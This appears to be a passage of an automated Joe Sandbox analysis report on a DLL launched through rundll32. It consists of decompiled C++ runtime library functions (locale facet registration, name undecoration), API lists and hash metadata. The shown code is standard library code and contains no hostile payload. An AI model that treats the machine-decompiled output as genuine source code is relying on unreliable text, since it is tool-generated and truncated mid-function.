																																	__eflags = E6E211339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t770 - 0x20);
																																		E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t544, _t726, _t744, 0x14);
																																		E6E206653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e2c6db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1E161C(0x6e2c6d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6E2066BA(_t770 - 0x14);
																																			return E6E220075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6E2113A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t770 - 0x20);
																																					E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t544, _t727, _t745, 0x14);
																																					E6E206653(_t770 - 0x14, 0);
																																					_t746 =  *0x6e2c6ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6E1E161C(0x6e2c6d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6E2066BA(_t770 - 0x14);
																																						return E6E220075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6E211409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t770 - 0x20);
																																								E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t544, _t728, _t746, 0x14);
																																								E6E206653(_t770 - 0x14, 0);
																																								_t747 =  *0x6e2c6de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6E1E161C(0x6e2c6d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6E2066BA(_t770 - 0x14);
																																									return E6E220075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6E211471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t770 - 0x20);
																																											E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t544, _t729, _t747, 0x14);
																																											E6E206653(_t770 - 0x14, 0);
																																											_t748 =  *0x6e2c6dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6E1E161C(0x6e2c6da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6E2066BA(_t770 - 0x14);
																																												return E6E220075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6E2114EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t770 - 0x20);
																																														E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t544, _t730, _t748, 0x14);
																																														E6E206653(_t770 - 0x14, 0);
																																														_t749 =  *0x6e2c6dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6E1E161C(0x6e2c6d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6E2066BA(_t770 - 0x14);
																																															return E6E220075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6E211558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t770 - 0x20);
																																																	E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t544, _t731, _t749, 0x14);
																																																	E6E206653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6e2c6e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6E1E161C(0x6e2c6dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6E2066BA(_t770 - 0x14);
																																																		return E6E220075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6E2115C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t770 - 0x20);
																																																				E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t544, _t732, _t750, 0x14);
																																																				E6E206653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6e2c6dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6E1E161C(0x6e2c6d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6E2066BA(_t770 - 0x14);
																																																					return E6E220075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6E21162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6E1E1438(_t663);
																																																							E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e26851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6e26c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6E21542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6E220075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6E206FD3(__eflags, _t733);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6e2c6dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6E206FD3(__eflags, _t732);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6e2c6e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6E206FD3(__eflags, _t731);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6e2c6dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6E206FD3(__eflags, _t730);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6e2c6dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6E206FD3(__eflags, _t729);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6e2c6de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6E206FD3(__eflags, _t728);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6e2c6ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6E206FD3(__eflags, _t727);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6e2c6db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6E206FD3(__eflags, _t726);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6e2c6dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6E206FD3(__eflags, _t725);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6e2c6dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6E206FD3(__eflags, _t724);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6e2c6dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6E206FD3(__eflags, _t723);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6e2c6df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6E206FD3(__eflags, _t722);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6e2c6df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6E206FD3(__eflags, _t721);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6e2c6dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6E206FD3(__eflags, _t720);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6e2c6df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6E206FD3(__eflags, _t719);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6e2c6dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6E206FD3(__eflags, _t718);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6e2c6dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6E206FD3(__eflags, _t717);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6e2c6db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20F230
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F23A
int.LIBCPMT ref: 6E20F251

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

messages.LIBCPMT ref: 6E20F274
std::_Facet_Register.LIBCPMT ref: 6E20F28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F2C9

Strings

lm,n, xrefs: 6E20F245

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lm,n
API String ID: 438560357-2206263333
Opcode ID: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
Instruction ID: 1c104a9268f021b353bb8231c8ab20f96f0e8e10f81fcfdd2560fc16708d8229
Opcode Fuzzy Hash: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
Instruction Fuzzy Hash: 5F11067990051E8FCF00DBE0C894AEEB77BAF84B15F240908E4206B3D0DF749A84C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E22735D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E22735D(void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;
				void* _t25;
				signed int* _t30;
				intOrPtr* _t33;
				void* _t42;

				E6E225A6C( &_v12, E6E22614D(0));
				_t33 =  *0x6e2c7218; // 0x0
				_t17 =  *_t33;
				if(_t17 == 0) {
					E6E226052( &_v12, 1);
					goto L8;
				} else {
					 *0x6e2c7218 = _t33 + 1;
					_t22 = _t17 - 0x30;
					if(_t22 == 0) {
						E6E225FF1( &_v12, "void");
						goto L8;
					} else {
						_t25 = _t22;
						if(_t25 == 0) {
							E6E225EFB( &_v12, E6E229DB3(_t42, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t25 != 3) {
								L8:
								E6E225FF1( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t30 = _a4;
								_t30[1] = _t30[1] & 0x00000000;
								 *_t30 =  *_t30 & 0x00000000;
								_t30[1] = 2;
								return _t30;
							}
						}
					}
				}
			}

0x6e22736f
0x6e227374
0x6e22737a
0x6e22737e
0x6e2273d3
0x00000000
0x6e227380
0x6e227384
0x6e22738a
0x6e22738d
0x6e2273c7
0x00000000
0x6e22738f
0x6e227390
0x6e227393
0x6e2273b8
0x00000000
0x6e227395
0x6e227398
0x6e2273d8
0x6e2273e0
0x6e2273e5
0x6e2273eb
0x6e2273f0
0x6e2273f4
0x6e22739a
0x6e22739a
0x6e22739d
0x6e2273a1
0x6e2273a4
0x6e2273a9
0x6e2273a9
0x6e227398
0x6e227393
0x6e22738d

APIs

UnDecorator::UScore.LIBVCRUNTIME ref: 6E227365
DName::DName.LIBVCRUNTIME ref: 6E22736F

Part of subcall function 6E225A6C: DName::doPchar.LIBVCRUNTIME ref: 6E225A93

UnDecorator::getScopedName.LIBVCRUNTIME ref: 6E2273AE
DName::operator+=.LIBVCRUNTIME ref: 6E2273B8
DName::operator+=.LIBCMT ref: 6E2273C7
DName::operator+=.LIBCMT ref: 6E2273D3
DName::operator+=.LIBCMT ref: 6E2273E0

Strings

void, xrefs: 6E2273BF

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
Instruction ID: 16cc9319238a68ac39c54c6150795e32d24dcece4c89620ef7e106bd7ad328bf
Opcode Fuzzy Hash: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
Instruction Fuzzy Hash: EE11A13585420D9FDB04DFE4C8A5FECBBBABB01709F0084A8F8019B2D5DBB0AA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t902 - 0x14, 0);
				_t861 =  *0x6e2c6db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1E161C(0x6e2c6d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E2066BA(_t902 - 0x14);
					return E6E220075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E210DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t902 - 0x20);
							E6E223D74(_t902 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t840, _t861, 0x14);
							E6E206653(_t902 - 0x14, 0);
							_t862 =  *0x6e2c6dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1E161C(0x6e2c6b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6E2066BA(_t902 - 0x14);
								return E6E220075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6E210E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t902 - 0x20);
										E6E223D74(_t902 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t637, _t841, _t862, 0x14);
										E6E206653(_t902 - 0x14, 0);
										_t863 =  *0x6e2c6de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6E1E161C(0x6e2c6d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6E2066BA(_t902 - 0x14);
											return E6E220075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6E210EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t902 - 0x20);
													E6E223D74(_t902 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t637, _t842, _t863, 0x14);
													E6E206653(_t902 - 0x14, 0);
													_t864 =  *0x6e2c6db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6E1E161C(0x6e2c6d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6E2066BA(_t902 - 0x14);
														return E6E220075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6E210F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t902 - 0x20);
																E6E223D74(_t902 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t637, _t843, _t864, 0x14);
																E6E206653(_t902 - 0x14, 0);
																_t865 =  *0x6e2c6dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6E1E161C(0x6e2c6d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6E2066BA(_t902 - 0x14);
																	return E6E220075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6E210F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t902 - 0x20);
																			E6E223D74(_t902 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t637, _t844, _t865, 0x14);
																			E6E206653(_t902 - 0x14, 0);
																			_t866 =  *0x6e2c6dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6E1E161C(0x6e2c6d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6E2066BA(_t902 - 0x14);
																				return E6E220075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6E210FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t902 - 0x20);
																						E6E223D74(_t902 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t637, _t845, _t866, 0x14);
																						E6E206653(_t902 - 0x14, 0);
																						_t867 =  *0x6e2c6df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6E1E161C(0x6e2c6d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6E2066BA(_t902 - 0x14);
																							return E6E220075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6E211057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t902 - 0x20);
																									E6E223D74(_t902 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t637, _t846, _t867, 0x14);
																									E6E206653(_t902 - 0x14, 0);
																									_t868 =  *0x6e2c6dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6E1E161C(0x6e2c6d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6E2066BA(_t902 - 0x14);
																										return E6E220075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6E2110BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
